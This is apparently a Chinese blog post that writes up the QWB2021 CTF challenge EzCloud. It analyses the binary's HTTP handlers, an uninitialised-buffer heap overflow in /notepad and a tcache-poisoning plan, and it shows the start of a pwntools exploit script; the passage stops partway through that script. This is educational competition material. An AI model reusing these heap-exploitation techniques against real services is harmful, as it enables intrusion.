<!doctype html>



  



    
  

<html class="theme-next logos use-motion" lang="zh-hk">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Hexo, NexT">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0">






<meta name="description" content="第五届强网杯的虚拟化系列题目，EzCloud 15解295分，比赛期间花了不少时间调试EzCloud的堆风水。">
<meta property="og:type" content="article">
<meta property="og:title" content="[QWB2021 Quals] - EzCloud">
<meta property="og:url" content="http://matshao.com/2021/06/15/QWB2021-Quals-EzCloud/index.html">
<meta property="og:site_name" content="Mid Station">
<meta property="og:description" content="第五届强网杯的虚拟化系列题目，EzCloud 15解295分，比赛期间花了不少时间调试EzCloud的堆风水。">
<meta property="og:locale" content="zh-hk">
<meta property="og:updated_time" content="2021-06-15T07:37:40.275Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[QWB2021 Quals] - EzCloud">
<meta name="twitter:description" content="第五届强网杯的虚拟化系列题目，EzCloud 15解295分，比赛期间花了不少时间调试EzCloud的堆风水。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Logos',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://matshao.com/2021/06/15/QWB2021-Quals-EzCloud/">





  <title> [QWB2021 Quals] - EzCloud | Mid Station </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-hk">

  









  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="header-logos"> 
      <div class="site-meta ">
  
    <div class="site-meta-headline">
      <a href="/">
        <img class="custom-logo-image" src="/images/logo_light.png" alt="Mid Station">
      </a>
    </div>
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Mid Station</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
    
      <p class="site-subtitle"></p>
    
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            歸檔
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            關於
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 
            
      </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://matshao.com/2021/06/15/QWB2021-Quals-EzCloud/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="Matthew Shao">
    <meta itemprop="description" content>
    <meta itemprop="image" content="/images/avatar.gif">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Mid Station">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="Mid Station" src="/images/logo_light.png">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                [QWB2021 Quals] - EzCloud
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-06-15T10:14:57+08:00">
                2021-06-15
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分類於</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Hack/" itemprop="url" rel="index">
                    <span itemprop="name">Hack</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>第五届强网杯的虚拟化系列题目，EzCloud 15解295分，比赛期间花了不少时间调试EzCloud的堆风水。</p>
<a id="more"></a>
<p>这题实现了一个HTTP服务，题目意图应该是模拟类似VMware vSphere的Web管理界面（虽然非常简陋）。下面简单说明一下程序主要逻辑和解题目标。</p>
<h2 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h2><p>程序实现了以下的路由函数，分析后发现只要完成登录然后通过GET请求访问<code>/flag</code>就能读取flag。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 __fastcall <span class="title">post_handler</span><span class="params">(request *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">6L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/login"</span>, <span class="number">6u</span>LL) )</span><br><span class="line">    <span class="keyword">return</span> do_login(a1);</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">7L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/logout"</span>, <span class="number">7u</span>LL) )</span><br><span class="line">    <span class="keyword">return</span> do_logout(a1);</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">9L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/createvm"</span>, <span class="number">9u</span>LL) )</span><br><span class="line">    <span class="keyword">return</span> do_createvm(a1);</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">10L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/connectvm"</span>, <span class="number">0xA</span>uLL) )</span><br><span class="line">    <span class="keyword">return</span> do_connectvm(a1);</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">8L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/closevm"</span>, <span class="number">8u</span>LL) )</span><br><span class="line">    <span class="keyword">return</span> do_closevm(a1);</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">8L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/notepad"</span>, <span class="number">8u</span>LL) )</span><br><span class="line">    <span class="keyword">return</span> do_notepad(a1);</span><br><span class="line">  <span class="keyword">return</span> html_404((__int64)a1);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 __fastcall <span class="title">get_handler</span><span class="params">(request *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">1L</span>L &amp;&amp; *(_BYTE *)a1-&gt;path.buf == asc_B47F[<span class="number">0</span>]</span><br><span class="line">    || a1-&gt;path.sz == <span class="number">6L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/index"</span>, <span class="number">6u</span>LL)</span><br><span class="line">    || a1-&gt;path.sz == <span class="number">10L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/index.php"</span>, <span class="number">0xA</span>uLL)</span><br><span class="line">    || a1-&gt;path.sz == <span class="number">11L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/index.html"</span>, <span class="number">0xB</span>uLL) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">return</span> do_index(a1);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">5L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/flag"</span>, <span class="number">5u</span>LL) )</span><br><span class="line">    <span class="keyword">return</span> do_flag(a1);</span><br><span class="line">  <span class="keyword">if</span> ( a1-&gt;path.sz == <span class="number">8L</span>L &amp;&amp; !<span class="built_in">memcmp</span>(a1-&gt;path.buf, <span class="string">"/notepad"</span>, <span class="number">8u</span>LL) )</span><br><span class="line">    <span class="keyword">return</span> do_notepad(a1);</span><br><span class="line">  <span class="keyword">return</span> html_404((__int64)a1);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>登录过程会在堆上新建如下的cred结构体，用于保存后续操作相关变量。登录操作会比较请求中的<code>Login-ID</code>和从<code>/dev/urandom</code>读取的0x40 byte随机数是否相同，相同的话会把<code>cred-&gt;is_login</code>设置为1，后续读flag操作会判断<code>is_login</code>字段，只有等于1的情况才会返回flag。因此攻击目标是把堆上的<code>cred-&gt;is_login</code>改写掉</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">cred</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  __int32 is_login;</span><br><span class="line">  strbuf login_id;</span><br><span class="line">  __int64 login_time;</span><br><span class="line">  __int32 a1;</span><br><span class="line">  __int32 fd1;</span><br><span class="line">  __int64 fd;</span><br><span class="line">  __int32 fd2;</span><br><span class="line">  __int32 a4;</span><br><span class="line">  strbuf *notes[<span class="number">16</span>];</span><br><span class="line">  cred *next;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>程序中定义了一个重要的结构体，我们把它命名为<code>strbuf</code>。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> __<span class="title">attribute__</span>((<span class="title">aligned</span>(8))) <span class="title">strbuf</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">void</span> *buf;</span><br><span class="line">  _QWORD chunk_sz;</span><br><span class="line">  _QWORD sz;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>解析HTTP请求中的几乎所有字符串操作都和这个结构体有关。包括URL、fields、body的解析等，相关的操作有两个，在解析HTTP请求的过程中有大量使用，基本就是当成局部字符串变量在使用，有点类似自定义的一个<code>strdup</code>函数。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> __fastcall <span class="title">make_strbuf</span><span class="params">(strbuf *dst, <span class="keyword">size_t</span> sz, <span class="keyword">const</span> <span class="keyword">void</span> *src)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> ( src )</span><br><span class="line">  &#123;</span><br><span class="line">    dst-&gt;chunk_sz = <span class="number">8</span> * ((sz &gt;&gt; <span class="number">3</span>) + <span class="number">1</span>);</span><br><span class="line">    dst-&gt;sz = sz;</span><br><span class="line">    dst-&gt;buf = <span class="built_in">malloc</span>(dst-&gt;chunk_sz);</span><br><span class="line">    <span class="built_in">memcpy</span>(dst-&gt;buf, src, sz);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> *__fastcall <span class="title">free_strbuf</span><span class="params">(strbuf *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">void</span> *result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( !a1-&gt;chunk_sz &amp;&amp; (result = a1-&gt;buf) == <span class="number">0L</span>L )</span><br><span class="line">    <span class="keyword">return</span> result;</span><br><span class="line">  <span class="built_in">free</span>(a1-&gt;buf);</span><br><span class="line">  a1-&gt;buf = <span class="number">0L</span>L;</span><br><span class="line">  a1-&gt;chunk_sz = <span class="number">0L</span>L;</span><br><span class="line">  result = a1;</span><br><span class="line">  a1-&gt;sz = <span class="number">0L</span>L;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>程序的漏洞在于<code>/notepad</code>的逻辑，里面实现了<code>new</code>, <code>edit</code>, <code>delete</code>三个操作。其中new部分存在内存未初始化漏洞。如果HTTP请求中的<code>Content-Type</code>不为<code>application/x-www-form-urlencoded</code>的，解析产生的<code>req-&gt;body.buf==0</code>，那么下面第13行的<code>make_strbuf</code>将不会起作用，导致12行<code>malloc</code>的<code>strbuf</code>未被初始化。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">  <span class="keyword">if</span> ( cred-&gt;notes[n] )</span><br><span class="line">  &#123;</span><br><span class="line">    a1a = (strbuf *)<span class="built_in">calloc</span>(<span class="number">0x18</span>uLL, <span class="number">1u</span>LL);</span><br><span class="line">    make_strbuf(a1a, <span class="number">8u</span>LL, <span class="string">"Invalid!"</span>);</span><br><span class="line">    v25 = html_msg((__int64)a1a);</span><br><span class="line">    free_strbuf(a1a);</span><br><span class="line">    <span class="built_in">free</span>(a1a);</span><br><span class="line">    result = v25;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    cred-&gt;notes[n] = (strbuf *)<span class="built_in">malloc</span>(<span class="number">0x18</span>uLL); <span class="comment">// unintalize buf</span></span><br><span class="line">    make_strbuf(cred-&gt;notes[n], req-&gt;body.sz, req-&gt;body.buf);</span><br><span class="line">LABEL_68:</span><br><span class="line">    v13 = (strbuf *)<span class="built_in">calloc</span>(<span class="number">0x18</span>uLL, <span class="number">1u</span>LL);</span><br><span class="line">    make_strbuf(v13, <span class="number">0x17</span>uLL, <span class="string">"Notepad operation done!"</span>);</span><br><span class="line">    v14 = html_msg((__int64)v13);</span><br><span class="line">    free_strbuf(v13);</span><br><span class="line">    <span class="built_in">free</span>(v13);</span><br><span class="line">    result = v14;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>未初始化的<code>strbuf-&gt;buf</code>会残留一个0x20 chunk的指针，<code>strbuf-&gt;sz</code>残留一个很大的值，结合edit操作就能构造一个堆溢出的漏洞。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( req-&gt;body.sz &gt; cred-&gt;notes[idx]-&gt;sz )</span><br><span class="line">&#123;</span><br><span class="line">  free_strbuf(cred-&gt;notes[idx]);</span><br><span class="line">  make_strbuf(cred-&gt;notes[idx], req-&gt;body.chunk_sz, req-&gt;body.buf);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">memcpy</span>(cred-&gt;notes[idx]-&gt;buf, req-&gt;body.buf, req-&gt;body.sz);</span><br><span class="line">  cred-&gt;notes[idx]-&gt;sz = req-&gt;body.sz;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h2><p>漏洞利用的思路并不复杂，我的思路是通过解析HTTP请求中的<code>make_strbuf</code>和<code>free_strbuf</code>形成堆喷射，让tcache中的chunk+0x18的位置残留我们可以控制的大数值。再edit的时候就能分配出能够堆溢出的note了。然后通过堆溢出构造tcache poison改写某个tcache bin的fd，最后分配出cred所在的内存再改写<code>is_login</code>字段。<br>难点在于解析HTTP请求过程太多<code>make_strbuf</code>调用了，每次到达notepad函数tcache bins都会发生变化，尝试很久才确定了通过HTTP fields来构造堆喷的方法，而堆溢出的时候也要考虑到覆盖的chunk在free过程中不会报错。</p>
<p>第一天晚上通过partial overwrite<code>chunk-&gt;fd</code>搞出一个本地能有1/16成功的exp。然而打远程的时候发现远程堆布局和本地不同。调试发现是exp发送HTTP请求的时候用了<code>payload.ljust(0x1000, &quot;\x00&quot;)</code>，发送过程可能和本地存在差异导致堆布局不同。第二天去掉padding的部分，调试堆风水先泄露堆地址，再计算堆地址偏移完整改写tcache bin的FD。最终版本exp打本地和打远程的堆地址还是存在0x20的偏移差异，好在不影响最终效果。</p>
<h2 id="exp-py"><a href="#exp-py" class="headerlink" title="exp.py"></a>exp.py</h2><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># QWB&#123;EzCloud is easy to be admin!!&#125;</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">context.terminal = [<span class="string">'tmux'</span>, <span class="string">'splitw'</span>, <span class="string">'-h'</span>]</span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.log_level = <span class="string">"debug"</span></span><br><span class="line">env = &#123;<span class="string">'LD_PRELOAD'</span>: <span class="string">'./libc-2.31.so'</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) == <span class="number">1</span>:</span><br><span class="line">    p = process(<span class="string">'./EzCloud'</span>)</span><br><span class="line">    off = <span class="number">0x17d0</span></span><br><span class="line"><span class="keyword">elif</span> len(sys.argv) == <span class="number">3</span>:</span><br><span class="line">    p = remote(sys.argv[<span class="number">1</span>], sys.argv[<span class="number">2</span>])</span><br><span class="line">    off = <span class="number">0x17b0</span></span><br><span class="line"></span><br><span class="line">se      = <span class="keyword">lambda</span> data               :p.send(data)</span><br><span class="line">sa      = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">sl      = <span class="keyword">lambda</span> data               :p.sendline(data)</span><br><span class="line">sla     = <span class="keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)</span><br><span class="line">sea     = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">rc      = <span class="keyword">lambda</span> numb=<span class="number">4096</span>          :p.recv(numb)</span><br><span class="line">ru      = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  :p.recvuntil(delims, drop)</span><br><span class="line">uu32    = <span class="keyword">lambda</span> data               :u32(data.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">uu64    = <span class="keyword">lambda</span> data               :u64(data.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">info_addr = <span class="keyword">lambda</span> tag, addr        :p.info(tag + <span class="string">': &#123;:#x&#125;'</span>.format(addr))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">(login_id)</span>:</span></span><br><span class="line">    payload = <span class="string">"POST /login HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"\r\n\r\n"</span></span><br><span class="line">    se(payload)</span><br><span class="line">    ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">logout</span><span class="params">(login_id)</span>:</span></span><br><span class="line">    payload = <span class="string">"POST /logout HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"\r\n\r\n"</span></span><br><span class="line">    se(payload)</span><br><span class="line">    ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">notepad_new_vuln</span><span class="params">(login_id, content, header=[])</span>:</span></span><br><span class="line">    action = <span class="string">"new%20note"</span></span><br><span class="line">    payload = <span class="string">"POST /notepad HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Content-Length: 100\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"Note-Operation: &#123;&#125;\r\n"</span>.format(action)</span><br><span class="line">    <span class="keyword">if</span> header:</span><br><span class="line">        <span class="keyword">for</span> h <span class="keyword">in</span> header:</span><br><span class="line">            payload += h</span><br><span class="line">    payload += <span class="string">"\r\n"</span></span><br><span class="line">    payload += content</span><br><span class="line">    se(payload)</span><br><span class="line">    time.sleep(<span class="number">0.1</span>)</span><br><span class="line">    ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">notepad_new_vuln1</span><span class="params">(login_id, content)</span>:</span></span><br><span class="line">    action = <span class="string">"new%20note"</span></span><br><span class="line">    payload = <span class="string">"POST /notepad HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"Content-Length: 100\r\n"</span></span><br><span class="line">    payload += <span class="string">"Note-Operation: &#123;&#125;\r\n"</span>.format(action)</span><br><span class="line">    payload += <span class="string">"\r\n"</span></span><br><span class="line">    payload += content</span><br><span class="line">    se(payload)</span><br><span class="line">    ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">notepad_new</span><span class="params">(login_id, content, header=[])</span>:</span></span><br><span class="line">    action = <span class="string">"new%20note"</span></span><br><span class="line">    payload = <span class="string">"POST /notepad HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Content-Length: 65535\r\n"</span></span><br><span class="line">    payload += <span class="string">"Content-Type: application/x-www-form-urlencoded\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"Note-Operation: &#123;&#125;\r\n"</span>.format(action)</span><br><span class="line">    <span class="keyword">if</span> header:</span><br><span class="line">        <span class="keyword">for</span> h <span class="keyword">in</span> header:</span><br><span class="line">            payload += h</span><br><span class="line">    payload += <span class="string">"\r\n"</span></span><br><span class="line">    payload += content</span><br><span class="line">    se(payload)</span><br><span class="line">    ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">notepad_edit</span><span class="params">(login_id, nid, content)</span>:</span></span><br><span class="line">    action = <span class="string">"edit%20note"</span></span><br><span class="line">    payload = <span class="string">"POST /notepad 